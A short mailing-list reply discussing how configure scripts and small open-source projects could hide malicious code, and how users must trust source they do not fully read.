der Mouse wrote:
The thing is, configure is an excellent place to hide
a malicious
grappling hook: it is frequently run by na?ve installers, not
uncommonly as root; by the nature of what it does, it is hard to
sandbox (for example, it *must* be able to compile and run new
programs); it is large and comparatively difficult to read over for
human verification.
Isn't that also a major *potential* hazard of open-source in general though?
At least for the smaller projects with little peer review process, someone
could relatively easily slip a piece of malicious code into the source - sure
it'd get spotted and fixed pretty quickly, but it could still happen just as
easily (or not) as it could with a configure script.
It's a question I've asked myself before of OSS: how do I *know* it's going to
do what it says it's going to do? Unfortunately the answer seems to be that I
don't - but thankfully in my experience OSS contributors are a self-policing
lot, so in reality it doesn't happen.
i.e. if I download some code from your website, I either have to look through
it all and understand it, or I have to simply trust that your code does
exactly what you say it'll do - regardless of what procedure's used to build
it on my system.
cheers
Jules